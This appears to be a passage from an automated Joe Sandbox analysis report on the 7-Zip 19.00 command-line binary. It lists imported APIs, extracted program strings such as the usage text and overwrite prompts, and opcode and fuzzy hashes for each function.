                                                                • Opcode Fuzzy Hash: c6c1dfda41fa0d06ad42f95544832c1263e566194fcfacdfad1f80fd41ef587c
                                                                • Instruction Fuzzy Hash: D5E16836314B8092CB58DF26E49479EB7A1F799F84F04912AEB8E47725DF39C896C700
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$AddressHandleModuleProc
                                                                • String ID: CreateHardLinkW$kernel32.dll
                                                                • API String ID: 399046674-294928789
                                                                • Opcode ID: 0711bf2b160802de48a7ad8e62ea8a456af0d095c717e74070ad8e7392e23327
                                                                • Instruction ID: 9564545b2a180550ec08a49ffe15895828ac5404859601d101661d2b4b092225
                                                                • Opcode Fuzzy Hash: 0711bf2b160802de48a7ad8e62ea8a456af0d095c717e74070ad8e7392e23327
                                                                • Instruction Fuzzy Hash: DF21E12231994091CE28EB25AC517EE5710ABD27D0F841235FE9A8B764DF29C8C6C700
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 4a8c016d17941940ccb69cce4f22d951ccabf5595733c0ae8ca37ad45cd0dd66
                                                                • Instruction ID: 4726d9cb42b47e2644ccdf1030762525696887a1a1a00368069882f3473ad589
                                                                • Opcode Fuzzy Hash: 4a8c016d17941940ccb69cce4f22d951ccabf5595733c0ae8ca37ad45cd0dd66
                                                                • Instruction Fuzzy Hash: 4E518322315A4195CA29EF25E8501EA6760FBD9BE4B580235FF5E47768DF38C6C7C700
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 4f627721fd3f548a9e12361352d12e7f0c520e4151b4dacedd918d3c46c14af4
                                                                • Instruction ID: 5b2ae23106886f52f3fc7fc0a41ea08affe5696dd4d97ded8155c7bc0b05e8e3
                                                                • Opcode Fuzzy Hash: 4f627721fd3f548a9e12361352d12e7f0c520e4151b4dacedd918d3c46c14af4
                                                                • Instruction Fuzzy Hash: 954191337149A8A6CB34AE55F88016D6361F7997A4F590236EF5E1BB14DB38CCA2C740
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7339f14c52790c104396c75c90f75acb671024a89b4c5f409cc22bad2f54e61d
                                                                • Instruction ID: 6c76965cb638dab5c2191b5bb2261a83b07981325cf776b16c749017d088e1a0
                                                                • Opcode Fuzzy Hash: 7339f14c52790c104396c75c90f75acb671024a89b4c5f409cc22bad2f54e61d
                                                                • Instruction Fuzzy Hash: 5A91EE32209B4087CB28DF25E49039FB762F795B94F544226EB5A477A9DF78C889CB40
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: d553175bd705add0397085a2f68dee216f55efb8e0660d055bcfc610d1b73714
                                                                • Instruction ID: fbede280e710c6e6a9b023ee52c30d5e6710af49e1f92f166c238479a68f332a
                                                                • Opcode Fuzzy Hash: d553175bd705add0397085a2f68dee216f55efb8e0660d055bcfc610d1b73714
                                                                • Instruction Fuzzy Hash: 34515A77208AC495CA24DF26E4903AF7761F79AB88F445112DF8E67B28CF39C496CB04
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 9943e524698941380e30c423019f5bc2cf16f063716f467c35492b6a2cf77687
                                                                • Instruction ID: 30b887c1937612c549d015109ed8b1f43cb75bd7ded0aaab6237f0715412bab6
                                                                • Opcode Fuzzy Hash: 9943e524698941380e30c423019f5bc2cf16f063716f467c35492b6a2cf77687
                                                                • Instruction Fuzzy Hash: F241E6B6305F8492CA28DF26E8902AE7361FBCAF95F459522DB4E43724DF39C495C304
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 49e297252a2c8ca67cda62bdf5dff8c128a9f435b231509b57c7dc761cb252a3
                                                                • Instruction ID: e85e3ab8a18070ba0516c627fd19e55ea4f9516fc9adb104413731b3439f433b
                                                                • Opcode Fuzzy Hash: 49e297252a2c8ca67cda62bdf5dff8c128a9f435b231509b57c7dc761cb252a3
                                                                • Instruction Fuzzy Hash: 4311492360188498CB59EE26DC512E82321EBA6F95F5D8271EF2E1F359DF30C8928350
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$memmove
                                                                • String ID:
                                                                • API String ID: 1534225298-0
                                                                • Opcode ID: 37bd50d8d1977fdd302a0b82f53c3d6d511d758968c823be9149fe37c82b5d04
                                                                • Instruction ID: e9117855387b1077ecc7691037811cb9dd0639752edd1535d34c7b7fb554fcc7
                                                                • Opcode Fuzzy Hash: 37bd50d8d1977fdd302a0b82f53c3d6d511d758968c823be9149fe37c82b5d04
                                                                • Instruction Fuzzy Hash: 8A010C23311944A6CA08EF26DD914AC7320FBA6F947084276EF2E4BB65DF30D8B6C344
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID: /$\$a$z
                                                                • API String ID: 1294909896-3795456795
                                                                • Opcode ID: 92741b9c6097dc57a5422346ae12ec5673efaeb8d1b2f3031f7aecb4c5395baf
                                                                • Instruction ID: b53730a91d702a90137574250655647fb2b53b33eb0ec5311af94b1def76ef84
                                                                • Opcode Fuzzy Hash: 92741b9c6097dc57a5422346ae12ec5673efaeb8d1b2f3031f7aecb4c5395baf
                                                                • Instruction Fuzzy Hash: 0441D192A0025499DB30EF21D4046B92760F353FECF8A4226DA95477B8EB79C9D6C703
                                                                APIs
                                                                Strings
                                                                • Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values, xrefs: 0015878E
                                                                • 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21, xrefs: 0015877E
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$fputs
                                                                • String ID: 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21$Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values
                                                                • API String ID: 2444650769-4238946813
                                                                • Opcode ID: 6a807e1f11532017a4cdd53ea1c09d8dec3d45ef8e00fbcf8e020d56cf8062a2
                                                                • Instruction ID: 73f07c029bb7aefdef8ab8df81272b68cb6dfd7d3785ab7a9fdd437142bb9918
                                                                • Opcode Fuzzy Hash: 6a807e1f11532017a4cdd53ea1c09d8dec3d45ef8e00fbcf8e020d56cf8062a2
                                                                • Instruction Fuzzy Hash: 35218132305684D5DA70DB25F9803E9B321F795B86F984435CE5D9B718CF38C88ACB40
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: AddressHandleModuleProc
                                                                • String ID: FindFirstStreamW$FindNextStreamW$kernel32.dll
                                                                • API String ID: 1646373207-4044117955
                                                                • Opcode ID: ac966f64d20482aa4fd5c134ec705327a834465029026a46f097207993e27cb5
                                                                • Instruction ID: 7305166295dd4c6e2530ba0cb655d4e272285803a899ec98e954f5a164ab988c
                                                                • Opcode Fuzzy Hash: ac966f64d20482aa4fd5c134ec705327a834465029026a46f097207993e27cb5
                                                                • Instruction Fuzzy Hash: 44E0EABCA41F06D1EA04DB51FCA839433A4F799756F905429C55A0B260AF78C19BC741
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$ErrorLast
                                                                • String ID:
                                                                • API String ID: 408039514-0
                                                                • Opcode ID: ba39d191a4783be6191a4353f763b9374f22025bd81bbd69dc5c6e5eb5e84779
                                                                • Instruction ID: 46d0670598067706255cabe875ef0f45df632cacc5e1185135382e00ea76eda1
                                                                • Opcode Fuzzy Hash: ba39d191a4783be6191a4353f763b9374f22025bd81bbd69dc5c6e5eb5e84779
                                                                • Instruction Fuzzy Hash: B731E56321458097CB30DF25E8A129EB7A0F7CA794F440235EB9E87B29DF39D895CB00
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: memcmp
                                                                • String ID:
                                                                • API String ID: 1475443563-0
                                                                • Opcode ID: 41d9d86949f01cac63a720bc7b2bd3e9f688eab33a43bcd64fe82cf42b54a768
                                                                • Instruction ID: 2256c6fa0699f180f40a753c2502fa114334e3d2bcf7bcdfa4e6e57844f974da
                                                                • Opcode Fuzzy Hash: 41d9d86949f01cac63a720bc7b2bd3e9f688eab33a43bcd64fe82cf42b54a768
                                                                • Instruction Fuzzy Hash: B831D1B1308B0095EB08DF669C913A827A5EB55FD4FC5A061DE079F22AEF34DB49C304
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: e90d6bb166ed15ba24e72fcfe06ac02a43145d9266722310fb98f001947c2363
                                                                • Instruction ID: 9264f73a66c9f16d868f59eacba99eca4602dc9ba4abdc11736096bbb6d1e6a1
                                                                • Opcode Fuzzy Hash: e90d6bb166ed15ba24e72fcfe06ac02a43145d9266722310fb98f001947c2363
                                                                • Instruction Fuzzy Hash: 07011A6324A58055C629FB22E4526AE6310E7D3B91F0911B2EF4E13711CF38C496C304
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: d9c09fb608b9bf2eac30e82356a3a9b3eaf7d7236c8fdec4e34535a6c9cfb299
                                                                • Instruction ID: 0ee66bde5e5a47cc426fa8eefe24349ef3913f6578db8e474bbd2bd70c62544d
                                                                • Opcode Fuzzy Hash: d9c09fb608b9bf2eac30e82356a3a9b3eaf7d7236c8fdec4e34535a6c9cfb299
                                                                • Instruction Fuzzy Hash: FB01B66225658055CA19FF36E4616AE6310EBD7B91F0911B2EF5E53721CF38C497C708
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: b0a25e55ccd52fa3f3baf4bdc67da172ff4df6f662b49c9aa123c0f49802e9bc
                                                                • Instruction ID: c8ac34fc068c4b68c432ffb993561585d36fc23a8b7cd081dac431bde93a3330
                                                                • Opcode Fuzzy Hash: b0a25e55ccd52fa3f3baf4bdc67da172ff4df6f662b49c9aa123c0f49802e9bc
                                                                • Instruction Fuzzy Hash: 2F01DA63711984A9CA18EE76DC911A82320ABA7B9975C4271FF2D4B755DF30CCA68384
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 69bfdf775510731243c3de3a419cefae75036ebb294f2fdce68b442dc703e0d6
                                                                • Instruction ID: e113979a1b8d320056d6544ab9b1e3398710109fbb2a3a37169194873c65b344
                                                                • Opcode Fuzzy Hash: 69bfdf775510731243c3de3a419cefae75036ebb294f2fdce68b442dc703e0d6
                                                                • Instruction Fuzzy Hash: 2E011A63611980AACB18EE36DC911E82720ABA6B98B1C4275FF2D4B755DF70C8E28344
                                                                APIs
                                                                • fputs.MSVCRT ref: 0015C91C
                                                                • fputs.MSVCRT ref: 0015C9F1
                                                                  • Part of subcall function 0015B1C8: memset.MSVCRT ref: 0015B20D
                                                                  • Part of subcall function 0015B1C8: fputs.MSVCRT ref: 0015B232
                                                                  • Part of subcall function 00112320: free.MSVCRT ref: 0011237E
                                                                  • Part of subcall function 00112320: fputs.MSVCRT ref: 001123B8
                                                                  • Part of subcall function 00112320: free.MSVCRT ref: 001123C4
                                                                  • Part of subcall function 00112300: fputc.MSVCRT ref: 00112311
                                                                • fputs.MSVCRT ref: 0015CADA
                                                                  • Part of subcall function 001122E4: fflush.MSVCRT ref: 001122EB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: fputs$free$fflushfputcmemset
                                                                • String ID: ERROR: $ERRORS:$WARNINGS:
                                                                • API String ID: 2975459029-4064182643
                                                                • Opcode ID: d2a1a2e72694af25cfe5264c7c3dc1886793622186513fdaa31e5f638f821b21
                                                                • Instruction ID: 4474b654b251b728df1442c47e21e0f513a7cc49aa2a02840cf12656ed3f5db3
                                                                • Opcode Fuzzy Hash: d2a1a2e72694af25cfe5264c7c3dc1886793622186513fdaa31e5f638f821b21
                                                                • Instruction Fuzzy Hash: 5C617266700685DACE38EF72E4513AEB711F755B85F484026DF2F0B601DF78D8A88390
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID: : $...$Junction: $REPARSE:
                                                                • API String ID: 1294909896-1476144188
                                                                • Opcode ID: 6483305c4f08a4f4140ab686dda4331553b33920a3cb9b28730788aac733e5f2
                                                                • Instruction ID: 8081a883f318946bfb51fd74578834afe1b8d61e74b9fde00b3b1a70ca3d9e81
                                                                • Opcode Fuzzy Hash: 6483305c4f08a4f4140ab686dda4331553b33920a3cb9b28730788aac733e5f2
                                                                • Instruction Fuzzy Hash: 77512772210A0593CB18DF21E8517EE7762FB91BA8F855032EA5B47369DF7CC685C710
                                                                APIs
                                                                • EnterCriticalSection.KERNEL32 ref: 00150E9C
                                                                  • Part of subcall function 0011339C: free.MSVCRT ref: 001133D7
                                                                  • Part of subcall function 0011339C: memmove.MSVCRT(00000000,?,?,00000000,001110A8), ref: 001133F2
                                                                • fputs.MSVCRT ref: 00150F5D
                                                                • fputs.MSVCRT ref: 00150FD8
                                                                • fputs.MSVCRT ref: 00150FF4
                                                                • LeaveCriticalSection.KERNEL32 ref: 00151092
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: fputs$CriticalSection$EnterLeavefreememmove
                                                                • String ID: ???
                                                                • API String ID: 2578255354-1053719742
                                                                • Opcode ID: 78e2c2c692378c993afccde280bacb5edd97984081905a44e3e3f63d2506d652
                                                                • Instruction ID: bb9f464383a1a11b38ff461a8b64dc47262e6e606843bc74bfb670c0d2374107
                                                                • Opcode Fuzzy Hash: 78e2c2c692378c993afccde280bacb5edd97984081905a44e3e3f63d2506d652
                                                                • Instruction Fuzzy Hash: B7515F32300A80E7DA5DDB21D9513EA6320F788795F444126EF3D0B7A4DF38D9A9C300
                                                                APIs
                                                                Strings
                                                                • Would you like to replace the existing file:, xrefs: 00150CF0
                                                                • with the file from archive:, xrefs: 00150D1C
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: CriticalSectionfputs$EnterLeave
                                                                • String ID: Would you like to replace the existing file:$with the file from archive:
                                                                • API String ID: 3346953513-686978020
                                                                • Opcode ID: b3065acbe4c6a92e9f3db648331256e44102a71c550aec0345d61f355809c24a
                                                                • Instruction ID: 08a64a304740bc58e2a053ac1ab68c75fbd139a19cee6c860ed7d1d213daba43
                                                                • Opcode Fuzzy Hash: b3065acbe4c6a92e9f3db648331256e44102a71c550aec0345d61f355809c24a
                                                                • Instruction Fuzzy Hash: B341C262344A82D2DA2A8FE5D8903E87320F789B92F4981229F3D0F351CF38D89DC304
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
